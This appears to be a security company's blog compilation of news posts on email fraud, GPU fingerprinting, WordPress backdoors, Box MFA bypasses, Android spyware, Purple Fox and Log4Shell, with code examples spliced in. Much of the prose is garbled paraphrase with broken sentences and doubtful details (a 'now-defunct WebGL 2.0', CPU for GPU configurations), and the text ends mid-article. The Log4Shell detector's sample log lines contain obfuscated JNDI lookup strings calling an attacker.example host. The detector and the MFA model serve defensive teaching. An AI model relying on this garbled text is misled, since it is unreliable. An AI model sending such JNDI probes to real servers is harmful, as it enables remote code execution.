Airzero Sec

We Do Not Give Up! Trust Us!

Vulnerability

In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to cross privilege boundaries within a computer system.

  • Compromise in Business Email

We've all heard that malicious actors are actively using e-mail scams to defraud government agencies, small and large businesses, and their victims. Most corporate financial transactions are now digital, which has resulted in an increase in financial crime, primarily due to cyber fraud.

The term "Business Email Compromise" refers to a variety of malicious activities, but all types of BEC have one thing in common: they require access to, or impersonation of, a business email account.

What Exactly Is BEC?

Business Email Compromise (BEC) is a type of targeted scam in which an attacker impersonates a corporate executive or high-level employee in order to rob the company or its partners or obtain sensitive data. The goal of a BEC scam is to persuade the target to give the attacker money or sensitive information while they believe they are conducting a legitimate business transaction.

Attackers accomplish this by using various deception techniques to persuade users to hand over money or personal information.

How Does a BEC Scam Operate?

BEC fraud, like other social engineering schemes, relies on the human element to be successful.

In other words, the attacker exploits the basic human instinct to be social and cooperative.

Because of their natural desire to help and to prove their worth, people are easy victims of BEC attacks. The urge to respond quickly to a request from your boss takes precedence over the urge to double-check whether the request is genuine in the first place.

Most BEC attacks consist of three primary steps:

  • Research

BEC scams, also known as "man-in-the-email" attacks, start with extensive research, with the attacker scouring publicly available information about the organization, such as websites, press releases, and social media posts.

  • Planning

After spending time researching its targets, the attacker devises a few scam scenarios that may succeed.

The attacker will either try to gain access to the email accounts of the company's most powerful people or spoof them. A spoofed domain can be as simple as one digit or one letter changed in the legitimate domain name; an email address on such a domain is easily mistaken for the real thing.
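As an added example (not part of the original post), the check below flags sender domains that are one character or one look-alike substitution away from a trusted domain, the kind of spoofed domain described above; the trusted domains, confusable pairs and test addresses are constructed for illustration.

```python
import re

# Domains the finance team legitimately corresponds with (constructed).
TRUSTED_DOMAINS = {"example.com", "example-supplier.net"}

# Substitutions that look identical at a glance; multi-character ones first.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("5", "s")]


def levenshtein(a: str, b: str) -> int:
    """Edit distance: how many single-character changes separate a from b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold_confusables(domain: str) -> str:
    """Map look-alike characters onto what they imitate ('examp1e' -> 'example')."""
    d = domain.lower()
    for fake, real in CONFUSABLES:
        d = d.replace(fake, real)
    return d


def sender_domain(address: str) -> str:
    """Domain part of a 'Name <user@host>' or bare 'user@host' header value."""
    m = re.search(r"@([A-Za-z0-9.-]+)", address)
    return m.group(1).lower() if m else ""


def classify_sender(address: str) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for a From: address.

    'lookalike' covers a domain one edit away from a trusted one, a homoglyph
    variant, or the trusted brand reused with a suffix or under another TLD.
    """
    domain = sender_domain(address)
    for trusted in TRUSTED_DOMAINS:
        if domain == trusted or domain.endswith("." + trusted):
            return "trusted"          # exact match or a subdomain of it
    for trusted in TRUSTED_DOMAINS:
        if fold_confusables(domain) == fold_confusables(trusted):
            return "lookalike"        # e.g. examp1e.com, exarnple.com
        if levenshtein(domain, trusted) <= 1:
            return "lookalike"        # e.g. exampl.com, example.co
        brand = trusted.split(".")[0]
        if brand in domain and domain.split(".")[0] != brand:
            return "lookalike"        # e.g. example-payments.com
    return "unknown"
```

A mail gateway rule would hold 'lookalike' messages for review rather than reject them outright, since legitimate new partners also land in 'unknown'.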

  • Attack

Depending on how thorough the attacker is, the BEC attack can occur in a single email or across an entire thread. To gain the victim's trust, this communication typically employs persuasion, urgency, and authority. The attacker will then instruct the victim to send money or provide sensitive information.

Types of BEC Attacks

  • The Fake Invoice Scam

This type of scam frequently targets businesses that work with international suppliers. The attackers pose as suppliers, seeking money transfers to a fraudulent account.

  • CEO Fraud

After gathering the necessary information, the attackers will impersonate the company's CEO or another high-ranking official and send an email to finance personnel requesting money transfers to a bank account controlled by them.

  • An Email Account Compromise (EAC)

A senior executive's or employee's email account is compromised and used to solicit invoice payments from suppliers listed in their email contacts. The funds are then transferred to bogus bank accounts.

Prevent Business Email Compromise

  • Educate your employees

Access to adequate cyber-security training for employees is a critical step that a company must take to protect itself from BEC. Employees should be made aware of the risks and consequences of these attacks, as well as how to spot a scam and respond appropriately in the event of one.

BEC attacks are successful not because they are technologically advanced, but because they take advantage of human weaknesses such as a reaction to authority, scheduling, or even exhaustion.

Clear communication of responsibilities and objectives, together with adequate guidance in the use of IT and accounting controls, can help to mitigate these risks. Cyber-security threats come in all shapes and sizes, so it is critical to detect, report, and respond to them correctly. Even though it may appear obvious, human error is to blame for 95 percent of successful cyber-attacks. Managers should keep in mind that hackers do not simply break into IT departments by brute force; they look for flaws. As a result, cyber-security skills and expertise are required for every position in the company.

Making cyber security a shared responsibility is critical, so include management and IT in your education programme, hold monthly cyber security sessions, and, of course, set specific rules for email, internet surfing, social media, and mobile devices. While there is no foolproof method for protecting your company, educating your employees on security risks and best practices for online behaviour and privacy will significantly reduce the risk of a BEC scam.

  • Encourage employees to object to any suspicious requests.

Because employees tend to rush through an activity or a reaction, teaching them to double-check before completing a task may reduce the risk of a cyber-attack. Consider an email from a senior executive in which a large sum of money is urgently demanded. Employees must understand that delaying a payment is preferable to being scammed, and they must make every effort to ensure that the request they received is legitimate.

BEC attacks, unfortunately, are here to stay because they require so little technical skill. To stay ahead of the growing threat of Business Email Compromise, organizations and employees must alter their mindsets, practices, and security solutions. If you have any doubts concerning the above issue, please contact us. Please do not hesitate to get in touch with us. Your security partner will be Airzero Sec.

Email:[email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

A group of researchers from French, Israeli, and Australian universities investigated the possibility of creating unique fingerprints from people's GPUs and using them for persistent web tracking.

The findings of their large-scale experiment, which involved 2,550 devices with 1,605 different CPU configurations, show that their technique, dubbed 'DrawnApart,' can increase the median tracking duration by 67 percent when compared to current state-of-the-art methods.

This is a serious issue for user privacy, which is currently protected by laws focusing on obtaining consent to activate website cookies.

Because of these laws, unscrupulous websites have begun to collect additional potential fingerprinting elements such as hardware configuration, operating system, timezones, screen resolution, language, fonts, and so on.

This unethical approach is still limited because these elements change frequently, and even when they are stable, they can only assign users to broad categories rather than creating a unique fingerprint.

Identical GPUs are being fingerprinted.

With the help of WebGL (Web Graphics Library), the researchers explored the possibility of creating unique fingerprints based on the GPU (graphics processing unit) of the tracked systems.

WebGL is a cross-platform API for rendering 3D graphics in browsers that is supported by all modern browsers. The DrawnApart tracking system can use this library to count the number and speed of execution units in the GPU, measure the time required to complete vertex renders, handle stall functions, and more.

To overcome the challenge of having random execution units handle the computations, DrawnApart uses short GLSL programmes executed by the target GPU as part of the vertex shader. As a result, workload distribution is predictable and standardized. The team created an on-screen measurement method that performs a small number of computationally intensive operations, as well as an off-screen measurement method that puts the GPU through a longer and less intensive test. This process generates traces made up of 176 measurements taken from 16 points, which are then used to create a fingerprint. Even when evaluating the individual raw traces visually, differences and distinct timing variations between devices can be observed.

The researchers also experimented with swapping out other hardware components on the machines to see if the traces could still be distinguished, and discovered that the fingerprints were solely dependent on the GPU.

Even if a set of integrated circuits is manufactured in the same way, with the same nominal computational power, the same number of processing units, and exactly the same cores and architecture, each circuit is slightly different due to normal manufacturing variability.

In normal day-to-day operations, these distinctions are indistinguishable, but they can be useful in the context of a sophisticated tracking system like DrawnApart, which is specifically designed to trigger functional aspects that highlight them.

Implications and considerations

When DrawnApart is combined with cutting-edge tracking algorithms, the median tracking duration of a targeted user increases by 67%.

As shown in the diagram below, the standalone tracking algorithm can achieve an average tracking time of 17.5 days, but with GPU fingerprinting, this can be extended to 28 days.

Based on the testing conditions, the GPU operational temperature range is between 26.4 °C and 37 °C, with no voltage variations. Workload variations, GPU payloads from other web browser tabs, system restarts, and other runtime changes have no effect on DrawnApart.

The next-generation GPU APIs that are currently in development, most notably WebGPU, include compute shaders in addition to the existing graphics pipeline. As a result, the upcoming API may introduce even more ways to fingerprint internet users, as well as much faster and more accurate methods. When the researchers tested compute shaders in the now-defunct WebGL 2.0, they discovered that DrawnApart achieved 98 percent classification accuracy in only 150 milliseconds, much faster than the 8 seconds required to collect fingerprinting data via the WebGL API.

"We believe that once the WebGPU API is widely available, a similar method can be developed. Before enabling accelerated compute APIs globally, the effects on user privacy should be considered," the research paper concludes. Attribute value changes, parallel execution prevention, script blocking, API blocking, and time measurement prevention are all potential countermeasures to this fingerprinting method.

Khronos Group, the developer of the WebGL API, has received the researchers' disclosure and formed a technical study group to discuss potential solutions with browser vendors and other stakeholders. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us. Your digital partner will be Airzero Sec.

Email:[email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

In yet another software supply chain attack, dozens of WordPress themes and plugins hosted on a developer's website were backdoored with malicious code in the first half of September 2021 with the intention of infecting additional sites.

The backdoor gave the attackers full administrative control over websites that used the 40 themes and 53 plugins of AccessPress Themes, a Nepal-based company with over 360,000 active website installations.

"The infected extensions contained a dropper for a web shell, giving the attackers full access to the infected sites," security researchers from JetPack, a WordPress plugin suite developer, wrote in a report published this week. "The same extensions worked fine when downloaded or installed from the WordPress[.]org directory."

The vulnerability has been identified as CVE-2021-24867. In a separate analysis, website security platform Sucuri found that some of the infected websites discovered using this backdoor had spam payloads dating back almost three years, implying that the actors behind the operation were selling access to the sites to operators of other spam campaigns.

Earlier this month, cybersecurity firm eSentire revealed how compromised WordPress websites belonging to legitimate businesses are used as a hotbed for malware delivery, serving an implant called GootLoader to unsuspecting users searching for postnuptial or intellectual property agreements on search engines like Google.

Site owners who installed the plugins directly from AccessPress Themes' website are advised to upgrade to a safe version as soon as possible or replace them with the latest version from WordPress[.]org. Furthermore, a clean version of WordPress must be deployed in order to undo the changes made during the backdoor installation.

The findings coincide with the disclosure by WordPress security company Wordfence of a now-patched cross-site scripting (XSS) vulnerability affecting a plugin called "WordPress Email Template Designer – WP HTML Mail" that is installed on over 20,000 websites.

The bug, identified as CVE-2022-0218, was rated 8.3 on the CVSS vulnerability scoring system and was addressed as part of updates released on January 13, 2022 (version 3.1).

"This flaw permitted an unauthenticated detractor to infiltrate negative JavaScript that would accomplish whenever a site manager accessed the template editor," explained Chloe Chamberland. "This vulnerability also allows them to modify the email template to include arbitrary data that could be used to launch a phishing attack against anyone who received emails from the compromised site."

According to data released this month by Risk Based Security, a whopping 2,240 security flaws were discovered and reported in third-party WordPress plugins by the end of 2021, a 142 percent increase from the previous year, when nearly 1,000 vulnerabilities were disclosed. A total of 10,359 WordPress plugin vulnerabilities have been discovered to date. If you have any reservations regarding the subject, please do not hesitate to get in touch with us. Your digital partner will be Airzero Sec.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Box has moved to patch a flaw in its SMS-based two-factor authentication (MFA), just weeks after its time-based one-time password (TOTP)-based MFA was discovered to be vulnerable as well.

Varonis Threat Labs detailed how the technique could allow an attacker to use stolen credentials to compromise an organization's Box account and exfiltrate sensitive data without access to the victim's phone in a technical blog post. "Once known, the vulnerability is extremely easy for an unsophisticated attacker to exploit," says Or Emanuel, head of Varonis Threat Labs.

SMS-based 2FA

Box, like many other applications, allows users who do not have Single Sign-On (SSO) to use a one-time passcode sent via SMS as a second authentication step.

When a user enters a username and password into Box's login form, Box stores a session cookie and redirects the user to enter either a time-based one-time password from an authenticator app or an SMS code to gain access to their Box.com account.

If the user does not go to the SMS verification form, no SMS message is sent, but a session cookie is generated – and a malicious actor.

Once the cookie is generated, the attacker can abandon the SMS-based MFA process and instead initiate the TOTP-based process: using the session cookie, they post a factor ID and a code from their own Box account and authenticator app to the TOTP verification endpoint.

Box failed to validate whether the victim was enrolled in TOTP verification or that the authenticator app used belonged to the user who was logging in.

Coordinated disclosure

According to Emanuel, the disclosure was made through HackerOne, and Box responded quickly.

The report comes on the heels of Varonis' late-year discovery that Box's TOTP-based MFA was also vulnerable to exploitation.

To log in, users must first enter their email address and password, followed by a one-time password generated by their authenticator app. Varonis discovered, however, that the user did not have to be fully authenticated in order to remove a TOTP device from a user's account.

As a result, the researchers were able to unenroll a user from MFA after providing a username and password but before providing the second factor. They could then log in without MFA and gain full access to the user's Box account.
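An added illustration of both checks described above, the missing factor-ownership validation in TOTP verification and the unenrollment that was allowed before the second factor, modelled in Python. This is not Box's code; the session model, factor registry, user names and TOTP seeds are constructed for the example.

```python
import hashlib
import hmac
import struct
import time
from dataclasses import dataclass
from typing import Optional


def totp(secret: bytes, now: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the time step that contains `now`."""
    counter = struct.pack(">Q", int(now) // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % (10 ** digits)).zfill(digits)


@dataclass
class Session:
    """Server-side state behind the cookie issued after the password step."""
    user: str
    password_ok: bool = True           # first factor accepted
    fully_authenticated: bool = False  # second factor accepted


@dataclass
class Factor:
    owner: str      # account the authenticator app was enrolled for
    secret: bytes   # shared TOTP seed


class MfaService:
    """Constructed registry: two accounts, each enrolled with one app."""

    def __init__(self) -> None:
        self.factors = {
            "factor-victim": Factor("victim", b"victim-seed-0123456789"),
            "factor-attacker": Factor("attacker", b"attacker-seed-987654321"),
        }

    def _code_ok(self, factor: Factor, code: str, now: float) -> bool:
        return hmac.compare_digest(totp(factor.secret, now), code)

    def verify_totp_vulnerable(self, session: Session, factor_id: str,
                               code: str, now: Optional[float] = None) -> bool:
        """Looks the factor up by id only, so a valid code from *any* enrolled
        authenticator completes the login for *any* session."""
        factor = self.factors.get(factor_id)
        if factor and self._code_ok(factor, code, now or time.time()):
            session.fully_authenticated = True
            return True
        return False

    def verify_totp_fixed(self, session: Session, factor_id: str,
                          code: str, now: Optional[float] = None) -> bool:
        """Require the password step, an existing factor, and that the factor
        was enrolled by the very account that is logging in."""
        factor = self.factors.get(factor_id)
        if not session.password_ok or factor is None:
            return False
        if factor.owner != session.user:
            return False  # someone else's authenticator: reject
        if not self._code_ok(factor, code, now or time.time()):
            return False
        session.fully_authenticated = True
        return True

    def unenroll_vulnerable(self, session: Session, factor_id: str) -> bool:
        """Accepts the request as soon as the password step has passed."""
        factor = self.factors.get(factor_id)
        if session.password_ok and factor and factor.owner == session.user:
            del self.factors[factor_id]
            return True
        return False

    def unenroll_fixed(self, session: Session, factor_id: str) -> bool:
        """Removing a second factor is itself a sensitive action: only a
        fully authenticated session that owns the factor may do it."""
        factor = self.factors.get(factor_id)
        if session.fully_authenticated and factor and factor.owner == session.user:
            del self.factors[factor_id]
            return True
        return False
```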

According to Emanuel, the team is currently testing other MFA implementations. "We believe it is extremely widespread because there are countless SaaS applications, the majority of which have their own MFA implementation." "The more we look, the more flaws we discover," he claims.

"There are numerous failure points, not just the vendor's MFA code. SMS messages, for example, can be intercepted in a variety of ways, including SIM jacking and port-out fraud. Authenticator apps may contain flaws. There are also backdoors into SaaS apps that completely bypass the login process, such as session hijacking."

If you have any questions about this issue, please contact us via the email address provided. Your security partner will be Airzero sec.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Malware can infect your Android phone in the same way that it can infect your computer. It slows down your system and causes glitches that make it difficult to use your phone. To protect your phone and yourself, you must act quickly. There are steps you can take to remove malware and protect your phone in the future, whether you downloaded an infected app or visited a corrupted website.

How to Get Rid of Malware and Viruses?

The initial step is to locate the malware on your phone. We'll show you how to do it, and then we'll give you some protection options, as well as antivirus apps you can use to restore your phone's health and keep it safe in the future.

Step 1: Turn off the phone until you have determined the specifics.

Once you've determined that your phone has been infected with malware, hold the power button down and turn the phone off completely. It will not prevent the malware from causing damage, but it will prevent the problem from worsening and may halt ongoing malware attempts to access nearby networks.

Shutting down also gives you time to reflect and conduct research. Do you know which infected app installed malware on your device? Do you know what other software it may have downloaded without your permission? If not, switch to a different computer and look up your symptoms (along with any new apps you tried out) to narrow down the problem. You can't remove an app if you can't find it at the source of the problem.

Step 2: While working, switch to safe/emergency mode. When you restart your device and attempt to isolate the problematic app, go into safe mode first. This will help to limit the amount of damage the infected app can cause.

Step 3: To enter safe mode on most Android devices, hold down the power button for a few seconds while the device is turned on, then tap and hold the Power off option.

Step 4: This should bring up a few power options, including a Reboot to safe mode option.

Select this mode and wait for your phone to reboot before proceeding. If you can't find a safe mode, use aeroplane mode to disconnect your device from all networks. That option is usually at the top of your notifications shade.

Note: If you can't figure out what's causing your malware problem after downloading a security app, don't tinker. Consult a professional to determine whether you should wipe your phone. This is a good strategy if ransomware, which is becoming more common, takes control of your phone and prevents you from doing anything.

Step 5: Navigate to Settings and locate the app.

On your Android device, go to Settings. Settings are typically represented by a gear-shaped icon, but this varies depending on your theme and layout; if you're having trouble finding it, search for it.

Step 6: In Settings, scroll down to the Apps section and click it. Look for a list of all your current apps — you may need to select App Manager to see the entire list.

Step 7: Once there, scroll down until you find the infected app that is causing your issues.

Step 8: Select the app, and you should be able to uninstall, force close, or force stop it (often, you cannot uninstall core apps, only disable them, but these apps are unlikely to be the problem).

Step 9: Select Uninstall to delete the infected app and anything else suspicious, and your Android device should remove the app in question. It's also a good idea to go through your app list and uninstall any suspicious downloads — if you haven't looked through this list before, you might be surprised at some of the strange things your device has on it.

What should you do if you are unable to uninstall the app?

In some cases, you will be unable to uninstall the problematic app. In fact, the option to delete may not exist at all. Instead, you'll see Disable on the menu, and that'll be the end of it. An app with superpowers (and potentially dangerous malware or ransomware) can gain access to your administrator settings. The app may have granted itself administrative privileges in order to protect itself from deletion.

Step 1: Simply return to the original Settings menu and scroll down to Lock Screen and Security (or a similar corresponding section).

Step 2: In the Security menu, look for a tab labeled Phone (Device) Administrators. Keep in mind that depending on the hierarchy of your security menu, you may need to go to Other security settings first. You should be able to find the setting that allows the malware to camp out in Phone Administrators.

Step 3: After that, all you have to do is tweak the settings and you can finally delete the app.

Get some Malware Protection

It's a good idea to give each Android device plenty of security and malware protection, and it's especially important to install antivirus software if you've had bad luck with questionable apps in the past. After you have manually deleted the app that is causing you problems, you will need to increase the overall security of your phone.

Fortunately, there are plenty of security apps available. Rather than downloading multiple apps that only do one or two things, look for a security app that has all of the features you need in one. A good security app will be able to delete junk or spam files, scan for viruses, and keep your data safe. Some apps have options to automatically delete any questionable software.

We recommend Safe Security, AVG Antivirus, or Avast Antivirus, all of which can be downloaded from the Google Play Store. In addition, we have a comprehensive guide to Android security and antivirus recommendations. You'll notice that your device performs better overall once you've downloaded proper malware protection.

Remember to always keep your software up to date with the latest version. Your devices should do this automatically, but you can manually check for updates on a regular basis. Your phone will be far more vulnerable to attack if you do not perform regular software updates. If you have any doubt about the topic, please contact us. Airzero Sec will be your security partner.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

PhoneSpy can steal important data, obtain the full list of installed apps, record audio and video in real time, extract device information, and even grant remote access to the device. Malware that spies on Android devices has been discovered in 23 apps. This Android malware, known as PhoneSpy, has been active in the US and Korean markets. One ray of hope is that none of the infected apps were available on Google Play.

PhoneSpy can steal critical data such as images, call logs, contacts, and messages, get the full list of installed apps, and record audio and video in real time. "The app has the ability to uninstall any user-installed applications, including mobile security apps." The malicious actors have real-time access to the device's precise location, all without the victim's knowledge. "The spyware also allows the threat actor to use phishing pages to harvest Facebook, Instagram, Google, and Kakao Talk credentials," the agency said in a statement.

To stay safe from such malware, users should never install apps from untrusted sources on their phones. In addition, never click on links or download attachments sent in suspicious emails or messages.

Airzero Sec is at the cutting edge of security technology, supporting you in conquering the most complex security challenges. If you have any questions, please contact us.

Email:[email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

On infected PCs, Trojanized Telegram chat app installers are being used to disseminate the Windows-based Purple Fox backdoor.

According to recent research from Minerva Labs, the attack differs from other types of intrusions that often exploit legitimate software to deliver harmful payloads.

"By separating the attack into considerable little files, the majority of which had very low detection speeds by engines, with the last stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was identified in 2018 and possesses rootkit characteristics, allowing it to elude detection by being planted outside the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation function, which allows the backdoor to proliferate faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a .NET implant used in conjunction with Purple Fox to interact with its command-and-control (C2) servers using WebSockets for a more secure method of communication.

The researchers concluded, "Purple Fox stays on impacted systems longer and delivers extra payloads."

Finally, in December 2021, Trend Micro revealed the Purple Fox infection chain's later stages, which include targeting SQL databases by inserting a malicious SQL common language runtime (CLR) module to gain a steady and stealthier performance and eventually abusing SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file: an AutoIt script that drops a legitimate Telegram installer and a malicious downloader called "TextInputh.exe," which is used to download next-stage malware from the C2 server.

Following that, the downloaded files disable antivirus engine processes before moving on to the last stage, which involves downloading and executing the Purple Fox rootkit from a now-defunct remote server.

"We detected a huge number of malware installers that used the same attack chain to deploy the same Purple Fox rootkit version," Zargarov added. "The attack's beauty is that each stage is segregated into its own file, leaving it unusable without the complete file set."

Every business faces daunting challenges when it comes to protecting its assets:

  • Threats that are new and evolving

  • Regulations governing privacy and compliance

  • The increased risk associated with digital transformation

With hundreds of point-solution vendors and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake Telegram messenger app, contact us through the given email.

Email:[email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, which aims to detect state inconsistency vulnerabilities in smart contracts that allow an attacker to tamper with transaction execution order or take over control flow within a single transaction (i.e., reentrancy).

The tool operates as follows. Given a smart contract, Sailfish converts it into a dependency graph that captures the control and data flow relations between storage variables and state-changing instructions. It then uses the graph to identify potential flaws by defining hazardous access, implemented as graph queries that determine whether two different execution paths, at least one of which performs a write operation, operate on the same storage variable.
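A toy version of the hazardous-access query, plus the single-transaction (reentrancy) case mentioned earlier, added here as an example and not taken from the Sailfish tool. The contract paths, instruction names and storage variable names are constructed; a real analysis would derive the paths from bytecode.

```python
from collections import defaultdict
from itertools import combinations

# Constructed execution paths for a toy vault contract. Each entry is
# (EVM instruction, storage variable or None, access kind).
PATHS = {
    "withdraw": [
        ("SLOAD", "balances", "read"),      # read caller's balance
        ("CALL", None, "external"),         # send Ether: control leaves us
        ("SSTORE", "balances", "write"),    # zero the balance afterwards
    ],
    "deposit": [
        ("SLOAD", "balances", "read"),
        ("SSTORE", "balances", "write"),
    ],
    "getOwner": [
        ("SLOAD", "owner", "read"),
    ],
}

# Same contract with withdraw() rewritten checks-effects-interactions style:
# the balance is written before control is handed to the callee.
PATHS_FIXED = dict(PATHS, withdraw=[
    ("SLOAD", "balances", "read"),
    ("SSTORE", "balances", "write"),
    ("CALL", None, "external"),
])


def storage_accesses(path):
    """Map each storage variable touched on a path to its access kinds."""
    accesses = defaultdict(set)
    for _, var, kind in path:
        if var is not None:
            accesses[var].add(kind)
    return accesses


def hazardous_accesses(paths):
    """Pairs of distinct paths that touch the same storage variable where at
    least one side writes it: the ordering-dependence query."""
    hazards = set()
    for a, b in combinations(sorted(paths), 2):
        acc_a, acc_b = storage_accesses(paths[a]), storage_accesses(paths[b])
        for var in acc_a.keys() & acc_b.keys():
            if "write" in acc_a[var] or "write" in acc_b[var]:
                hazards.add((var, a, b))
    return sorted(hazards)


def reentrancy_candidates(paths):
    """Single-transaction case: a path reads a variable, hands control to an
    external callee, then writes that variable. The callee can re-enter
    before the write lands and observe stale state."""
    found = []
    for name, path in paths.items():
        read_before_call, control_left = set(), False
        for _, var, kind in path:
            if kind == "external":
                control_left = True
            elif kind == "read" and not control_left:
                read_before_call.add(var)
            elif kind == "write" and control_left and var in read_before_call:
                found.append((name, var))
    return sorted(found)
```

Both queries are necessary but not sufficient: every flagged pair still needs a reachability and value-range check before it is reported, which is the part of the real analysis this toy omits.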

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This also includes a vulnerable contract implementing a housing tracker that could be abused in such a way that a homeowner could have multiple active listings. The study's findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies for many years. Use our previous experience to your advantage, whether it's to assist you in getting there or to perform technical tests. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us.

Email: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.

"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by the Microsoft Threat Intelligence Center. "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks."

The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.

Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over compromised machines and mount an evolving collection of attacks ranging from cryptocurrency miners to ransomware.

Even as mass scanning attempts continue unabated, attackers are working to evade string-matching detections by obfuscating the malicious HTTP requests. These requests are crafted so that Log4j writes the attacker's string into a web request log, where the embedded JNDI lookup causes the server to fetch from an attacker-controlled site.
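The evasion described above works because a plain substring match for the lookup can be defeated by Log4j's own nested lookups, which the logger resolves before the JNDI request is made. As an added defender-side example (not Microsoft's guidance or tooling; the sample log lines and the `attacker.example` host are constructed), the detector below resolves the common case-conversion and default-value lookups first and then matches on what the logger would actually see:

```python
import re

# ${lower:x}/${upper:x} transform one token; ${...:-x} is a default-value lookup
# whose prefix is empty or unresolvable, so Log4j substitutes the fallback x.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

def normalize(s, max_rounds=10):
    """Resolve nested case/default lookups inside-out until the string is stable.
    Only lookup-based obfuscation is handled; URL decoding is left to the log
    pipeline that produced the line."""
    for _ in range(max_rounds):
        prev = s
        s = _CASE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                      else m.group(2).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
        if s == prev:
            break
    return s

_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def is_log4shell_probe(line):
    """Match the JNDI lookup only after normalization, so the obfuscated
    variants collapse to the same signature as the plain one."""
    return bool(_JNDI.search(normalize(line)))

SAMPLE_LOG = [   # constructed access-log lines with the User-Agent field quoted
    '203.0.113.5 "GET / HTTP/1.1" ua="${jndi:ldap://attacker.example/a}"',
    '203.0.113.5 "GET / HTTP/1.1" ua="${${lower:j}${upper:n}di:ldap://attacker.example/a}"',
    '203.0.113.5 "GET / HTTP/1.1" ua="${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '203.0.113.5 "GET / HTTP/1.1" ua="Mozilla/5.0 ${date:yyyy}"',
]

def flag_lines(lines):
    """Indices of lines that contain a (possibly obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]
```

A naive `"${jndi:" in line` check flags only the first sample line; after normalization the three probe lines match and the benign `${date:yyyy}` line does not.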

Microsoft also reported "rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems." Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and HabitsRAT, have been delivered via the Log4Shell vulnerability.

